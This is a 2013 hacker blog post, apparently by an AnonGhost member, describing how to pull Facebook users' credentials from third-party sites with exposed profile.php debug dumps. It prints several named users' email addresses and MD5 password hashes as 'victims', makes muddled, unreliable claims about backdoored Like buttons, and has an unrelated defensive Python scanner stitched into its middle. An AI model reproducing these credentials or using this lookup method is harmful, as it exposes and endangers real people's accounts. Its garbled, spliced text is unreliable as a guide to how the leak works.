Friday, June 7, 2013

Exploit Facebook Via External Plugins and Modules


#############################################################
# Title: Exploit Facebook Via External Plugins and Modules
# Exploitation: Manually (use your brain ^_^)
# Date: 28/03/2013
# Greetz: Virusa Worm - Man Sykez - BL4ckc0d1n6 and all AnonGhost Memberz
# Author: Mauritania Attacker
#############################################################


For Example my victim is =======>>> https://www.facebook.com/gaturro22

How could I retrieve his password? Easy.


Proof of Concept : Facebook Id ====>>> gaturro22


P0C : ======>>> http://www.poringapic.com/profile.php?id=gaturro22


So as you can see we got the email & the password :

Email: gonza.la22@gmail.com

Password: e10adc3949ba59abbe56e057f20f883e

Another Demo : http://www.salondaddy.com/profile.php?ID=85


So when I try the same method with my own profile, for example : http://www.poringapic.com/profile.php?id=mauritanie.forever

It says "Invalid profile link followed!" loool, because I didn't click the Like Button. So a word of advice: be careful, don't like external pages on websites. They are backdoored with JavaScript malware that can sniff all your information.

So for example the ID "profile.php" is infected with "Code Disclosure Path". As you can see, most websites nowadays use Facebook plugins, especially applications, so the Facebook user must grant the application permission to access, and most of the plugins are infected !_!

So if you see that a website has the Like Plugin or uses a Facebook app, you can surely get the passwords of the users, no doubt. Just use your brain !

Another Example : http://www.rosexconect.net/profile.php?ID=15370&shPhotosMode=top

Check this : [NickName] => orso44 ===========>>> add this to www.facebook.com

http://www.facebook.com/orso44 ============>>> Facebook Profile

[Password] => 5c4e79dd006fb00a07945801234d0dd5 ===========>>> Password Hashed in Md5


Another Victim : ==========>>> https://www.facebook.com/kornberg

Infos Retrieved :

[_iProfileID] => 7893
[_aProfile] => Array
(
[datafile] => 1
[ID] => 7893
[NickName] => Kornberg
[Email] => anselmpennell435@yahoo.com
[Password] => 087fbfdeb33dae28260cfdb8f2d8a787
[Status] => Active
{
"id": "862420463",
"name": "Zoe Kornberg",
"first_name": "Zoe",
"last_name": "Kornberg",
"username": "kornberg",
"gender": "female",
"locale": "en_US"
}


I just selected this user randomly from Facebook and I noticed that she clicked on the Like Button and she has been a victim °_° !!!!!!!
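A defensive check for the kind of leak shown above, as an added example that is not from the original post: it scans your own application's HTTP response bodies for PHP print_r-style dumps that expose account fields. The key list, function names and sample responses are assumptions constructed for illustration.

```python
import re

# Field names whose presence in a rendered page means an account record leaked.
# (Assumed list for this example; extend it to match your own schema.)
SENSITIVE_KEYS = {"password", "passwd", "email", "salt"}

# One element of PHP print_r() output, e.g. "    [Key] => value"
PRINT_R_ENTRY = re.compile(
    r"^[ \t]*\[([^\]\n]+)\][ \t]*=>[ \t]*(.*?)[ \t]*$", re.MULTILINE
)
# 32 hex characters: the shape of an unsalted MD5 digest
MD5_SHAPE = re.compile(r"^[0-9a-fA-F]{32}$")


def find_leaks(body):
    """Return (key, reason) findings for one response body."""
    findings = []
    for key, value in PRINT_R_ENTRY.findall(body):
        if not value or value == "Array":  # empty value or nested-array header
            continue
        if key.lower() in SENSITIVE_KEYS:
            reason = "sensitive field in debug dump"
            if MD5_SHAPE.match(value):
                reason += " (MD5-shaped value)"
            findings.append((key, reason))
    return findings


def audit(responses):
    """Map each path to its findings; clean responses are omitted."""
    report = {}
    for path, body in responses.items():
        hits = find_leaks(body)
        if hits:
            report[path] = hits
    return report


# Constructed sample responses (not taken from any real site).
SAMPLE = {
    "/profile.php?ID=1": (
        "<html><pre>[_iProfileID] => 1\n[_aProfile] => Array\n(\n"
        "    [ID] => 1\n    [NickName] => alice\n"
        "    [Email] => alice@example.com\n"
        "    [Password] => 00000000000000000000000000000000\n"
        "    [Status] => Active\n)\n</pre></html>"
    ),
    "/about.php": "<html><body>About us. Contact: [see form]</body></html>",
}

if __name__ == "__main__":
    for path, hits in audit(SAMPLE).items():
        print(path, hits)
```

Run against captured responses from a staging crawl or an integration test suite, any finding means a page is rendering a stored record it should never output.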





7 comments:

  1. Hello please give me the name of the site web that we must like
    sorry for my bad English thank you
